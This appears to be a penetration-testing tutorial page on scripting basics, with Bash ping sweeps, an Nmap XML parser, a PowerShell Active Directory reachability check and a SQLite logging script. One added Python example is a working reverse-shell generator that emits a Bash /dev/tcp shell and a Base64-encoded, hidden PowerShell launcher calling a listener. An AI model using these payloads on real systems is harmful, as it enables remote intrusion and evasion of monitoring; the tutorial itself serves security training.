Scripting Basics
Scripting automates repetitive tasks, accelerates testing, and glues tools together. A single script can gather data, transform output, launch exploits, and log results in seconds. The three core environments are Bash (Unix-like systems), PowerShell (Windows, and cross-platform since PowerShell Core) and Python (available almost everywhere); each has its own syntax, yet all follow the same logic: read input → process → act.
Common Techniques
- Parsing tool output and extracting key fields with regular expressions or JSON filters (for example jq)
- Looping through wordlists, IP ranges, or file paths to launch bulk scans
- Wrapping exploits in functions for re-use across targets
- Chaining commands with pipes to form one-liner workflows
- Reading STDIN / STDOUT for live data transformation
- Generating payloads dynamically (reverse shells, encoded scripts, shellcode)
- Logging actions and timestamps to CSV or SQLite for later reporting
- Using environment variables and arguments to create portable modules
- Invoking REST APIs to pull scope lists, asset inventories, or vulnerability feeds
- Scheduling scripts via cron, Task Scheduler, or at jobs for continuous monitoring
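As an added example that is not part of the original page, the following Python script combines several of the techniques above: it reads ping output from STDIN, pulls the responding IP and round-trip time out of each reply line with a regular expression, takes its database path from an environment variable, and logs every hit with a UTC timestamp into SQLite for later reporting. The sample ping lines, the SWEEP_DB variable, the table name and the file name log_ping.py are constructed for the example.

```python
#!/usr/bin/env python3
"""Parse ping output from STDIN and log responsive hosts to SQLite.

Example pipeline:  ping -c 1 10.0.0.1 | SWEEP_DB=lab.db python3 log_ping.py lab-sweep
Added example; SWEEP_DB, the table name and the sample lines are assumptions.
"""
import os
import re
import sqlite3
import sys
from datetime import datetime, timezone

# One iputils ping reply line looks like:
#   64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.312 ms
# or, when reverse DNS resolves:
#   64 bytes from gw.lab (10.0.0.254): icmp_seq=1 ttl=255 time=1.07 ms
REPLY_RE = re.compile(
    r"^\d+ bytes from (?:[^\s(]+ \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?:"
    r".*?time=(?P<rtt>[\d.]+) ms"
)


def parse_replies(text):
    """Return [(ip, rtt_ms), ...] for every reply line in ping output.

    Lines that are not replies (banner, statistics, unreachable notices) are ignored.
    """
    hits = []
    for line in text.splitlines():
        m = REPLY_RE.match(line.strip())
        if m:
            hits.append((m.group("ip"), float(m.group("rtt"))))
    return hits


def log_hits(db_path, hits, scan_id="manual"):
    """Insert hits into SQLite with a UTC timestamp; return the number of rows written."""
    conn = sqlite3.connect(db_path)
    try:
        conn.execute(
            "CREATE TABLE IF NOT EXISTS live_hosts ("
            "ts TEXT, scan_id TEXT, ip TEXT, rtt_ms REAL)"
        )
        ts = datetime.now(timezone.utc).isoformat(timespec="seconds")
        # Parameterised INSERT: tool output is untrusted input, never format it into SQL
        conn.executemany(
            "INSERT INTO live_hosts VALUES (?, ?, ?, ?)",
            [(ts, scan_id, ip, rtt) for ip, rtt in hits],
        )
        conn.commit()
    finally:
        conn.close()
    return len(hits)


def live_ips(db_path, scan_id="manual"):
    """Read back the distinct IPs logged for one scan, sorted, for a report."""
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute(
            "SELECT DISTINCT ip FROM live_hosts WHERE scan_id = ? ORDER BY ip",
            (scan_id,),
        ).fetchall()
    finally:
        conn.close()
    return [r[0] for r in rows]


# Constructed sample: two hosts answered, one was unreachable, plus the usual ping chatter.
SAMPLE_OUTPUT = """\
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.312 ms
64 bytes from gw.lab (10.0.0.254): icmp_seq=1 ttl=255 time=1.07 ms
From 10.0.0.9 icmp_seq=1 Destination Host Unreachable
--- 10.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
"""

if __name__ == "__main__":
    # Database path comes from an environment variable so the script stays portable
    db = os.environ.get("SWEEP_DB", "sweep.db")
    # Scan label comes from the first argument, so runs can be told apart in the table
    scan_id = sys.argv[1] if len(sys.argv) > 1 else "manual"
    # Read real tool output from STDIN when piped, otherwise fall back to the sample
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    n = log_hits(db, parse_replies(text), scan_id=scan_id)
    print(f"logged {n} replies to {db} under scan_id={scan_id}")
```

The regex is anchored to the reply-line shape rather than grepping for "64 bytes", so a packet size other than 56 data bytes still parses, and the optional "hostname (" group handles the reverse-DNS form. Writing through parameterised SQL matters even for ping output: anything a script ingests from the network is attacker-influenced input.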
Tools
- Bash (POSIX-compatible shell with an extensive native command set; arrays, brace expansion and &> redirection are Bash extensions, so use #!/bin/bash rather than #!/bin/sh when a script relies on them)
- Python (multiplatform language with libraries such as subprocess, requests, and pwntools)
- PowerShell (object-centric shell for Windows and cross-platform automation)
- jq (lightweight JSON processor ideal for API or tool output)
- awk & sed (stream editors for quick text manipulation)
- Expect (automates interactive CLI sessions)
- Impacket scripts (Python library and example scripts for SMB, MSRPC, Kerberos and other Windows network protocols)
- pwntools (CTF-oriented Python framework for exploit development)
- psutil (Python library for process and system information)
- Invoke-Obfuscation (PowerShell module for payload transformation)
- Cron / Task Scheduler (native schedulers for timed script execution)
- tmux / screen (terminal multiplexers that keep long-running scripts alive)
Quick Examples
Bash
This script scans a given subnet for live hosts by sending ICMP echo requests (ping) and prints responding IP addresses.
#!/bin/bash
# Usage: ./script.sh 192.168.1
# Pings every host in a /24 (first three octets passed as $1) and prints the ones that answer
if [ -z "$1" ]; then
  echo "Usage: $0 <first three octets, e.g. 192.168.1>" >&2
  exit 1
fi
# Loop through host numbers 1 to 254
for ip in $(seq 1 254); do
  # Send one echo request (-c 1) and wait at most one second for the reply (-W 1),
  # so a silent host does not stall the sweep
  ping -c 1 -W 1 "$1.$ip" |
    # Keep only reply lines, e.g. "64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.3 ms"
    grep "64 bytes" |
    # Field 4 is the IP with a trailing colon
    cut -d " " -f 4 |
    # Strip the colon
    tr -d ":" &
done
# Wait for the background pings so every result is printed before the script exits
wait
# Notes:
# - $(...) is used instead of backticks `...` (modern syntax)
# - '&' runs each ping in the background so the 254 pings overlap instead of running serially
# - -W 1 is the Linux (iputils) form; on macOS -W takes milliseconds, so use -W 1000 there
# - Usage: ./script.sh 192.168.1
This script performs a fast parallel ping sweep across a /24 subnet and logs all responsive IPs to a CSV file.
#!/bin/bash
# Scan a subnet (10.10.10.1-254) and log live hosts to a CSV file
# Brace expansion and &> are Bash features, hence the #!/bin/bash shebang
echo "ip,status" > live.csv
# Loop over all IPs in the subnet
for ip in 10.10.10.{1..254}; do
  # Ping each IP once (-c1), wait at most 1 second for a reply (-W1),
  # discard the output (&>/dev/null) and, if the host answered, append a row
  ping -c1 -W1 "$ip" &>/dev/null && echo "$ip,up" >> live.csv &
done
# Wait for all background pings to finish before the script exits
wait
Python
This script extracts and displays open ports for each host from a parsed Nmap XML scan report.
# Parse Nmap XML output (nmap -oX scan.xml ...) and print open ports per host
# Usage: python3 parse_nmap.py scan.xml
import sys
import xml.etree.ElementTree as ET  # XML parser from the standard library

# Take the report path from the command line, defaulting to scan.xml
path = sys.argv[1] if len(sys.argv) > 1 else 'scan.xml'
tree = ET.parse(path)

# Loop through each host in the scan
for host in tree.findall('.//host'):
    # A host can carry several <address> elements (ipv4, ipv6, mac); pick the IPv4 one
    addr_el = host.find("address[@addrtype='ipv4']")
    if addr_el is None:
        continue
    addr = addr_el.attrib['addr']
    # ElementTree's XPath subset cannot filter on a grandchild attribute
    # (port[state/@state="open"] raises SyntaxError: invalid predicate),
    # so check each port's <state> child explicitly
    ports = [
        p.attrib['portid']
        for p in host.findall('.//port')
        if p.find('state') is not None and p.find('state').get('state') == 'open'
    ]
    # Print IP address and a comma-separated list of open ports
    print(addr, ','.join(ports))
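The "generating payloads dynamically" and "wrapping exploits in functions for re-use across targets" items from the techniques list, as an added Python example that is not part of the original page: it builds a Bash reverse-shell one-liner for a listener, builds the PowerShell equivalent, encodes it in the UTF-16LE/Base64 form that powershell.exe -EncodedCommand expects, and validates the listener address and port first so a typo does not become a silent failure on the target. The listener 10.10.14.5:4444, the script name gen.py and the helper names are constructed for the example; the encoding rule (Base64 over UTF-16LE, not UTF-8) is PowerShell's documented behaviour.

```python
#!/usr/bin/env python3
"""Generate reverse-shell payloads for a listener and encode them for delivery.

Added example. The LHOST/LPORT defaults below are made up for the demonstration.
"""
import base64
import ipaddress
import sys


def check_listener(lhost, lport):
    """Validate listener details once, so every generator gets sane input.

    Design choice: only IP literals are accepted, because a hostname in a payload
    adds a DNS lookup on the target that may fail or be logged.
    """
    ipaddress.ip_address(lhost)          # raises ValueError on a malformed address
    if not 1 <= int(lport) <= 65535:
        raise ValueError(f"port out of range: {lport}")
    return lhost, int(lport)


def bash_reverse_shell(lhost, lport):
    """Classic /dev/tcp reverse shell; needs a bash built with /dev/tcp support on the target."""
    lhost, lport = check_listener(lhost, lport)
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def powershell_reverse_shell(lhost, lport):
    """TCP-client reverse shell in PowerShell, as a single line for -EncodedCommand."""
    lhost, lport = check_listener(lhost, lport)
    return (
        f"$c=New-Object Net.Sockets.TCPClient('{lhost}',{lport});"
        "$s=$c.GetStream();[byte[]]$b=0..65535|%{0};"
        "while(($i=$s.Read($b,0,$b.Length)) -ne 0){"
        "$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);"
        "$o=(iex $d 2>&1|Out-String);$r=$o+'PS '+(pwd).Path+'> ';"
        "$sb=[Text.Encoding]::ASCII.GetBytes($r);$s.Write($sb,0,$sb.Length);$s.Flush()};"
        "$c.Close()"
    )


def encode_powershell(command):
    """Encode a command for `powershell -EncodedCommand`.

    The switch expects Base64 of the UTF-16LE bytes, not of UTF-8, which is why
    `echo cmd | base64` on Linux produces a blob that PowerShell rejects.
    """
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob):
    """Inverse of encode_powershell; useful when triaging a suspicious -enc argument in logs."""
    return base64.b64decode(blob).decode("utf-16-le")


def encoded_launcher(lhost, lport):
    """Full Windows one-liner: powershell.exe with the encoded reverse shell."""
    blob = encode_powershell(powershell_reverse_shell(lhost, lport))
    return f"powershell.exe -NoP -NonI -W Hidden -EncodedCommand {blob}"


if __name__ == "__main__":
    # Constructed example listener; override with: python3 gen.py <lhost> <lport>
    lhost = sys.argv[1] if len(sys.argv) > 1 else "10.10.14.5"
    lport = sys.argv[2] if len(sys.argv) > 2 else "4444"
    print("[bash]      ", bash_reverse_shell(lhost, lport))
    print("[powershell]", encoded_launcher(lhost, lport))
```

Keeping validation in one helper and the payload text in small pure functions is what makes the "wrap it in a function" advice pay off: the same generators can be called in a loop over a target list, unit-tested offline, and the decoder doubles as a triage tool on the defensive side. Note that the Base64 form is an encoding, not obfuscation; Invoke-Obfuscation from the tools list is the separate step for that.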
PowerShell
This script queries all computer objects in Active Directory and checks which ones respond to ping.
# Get all Active Directory computer names and test if they are reachable
# Requires the ActiveDirectory module (RSAT) and a domain-joined session
Import-Module ActiveDirectory
# Query all computer objects in Active Directory
Get-ADComputer -Filter * |
    # Keep only the 'Name' property (hostnames)
    Select-Object -ExpandProperty Name |
    # For each hostname, send a single echo request and keep only the boolean result
    ForEach-Object {
        if (Test-Connection -ComputerName $_ -Count 1 -Quiet -ErrorAction SilentlyContinue) {
            # If reachable, print confirmation message
            "$_ reachable"
        }
    }
# Notes:
# Test-Connection is the PowerShell equivalent of 'ping'
# -Quiet returns only $true or $false instead of reply objects
# -Count 1 sends one request instead of the default four, which matters across a large domain
# -ErrorAction SilentlyContinue keeps stale computer objects that no longer resolve from spamming errors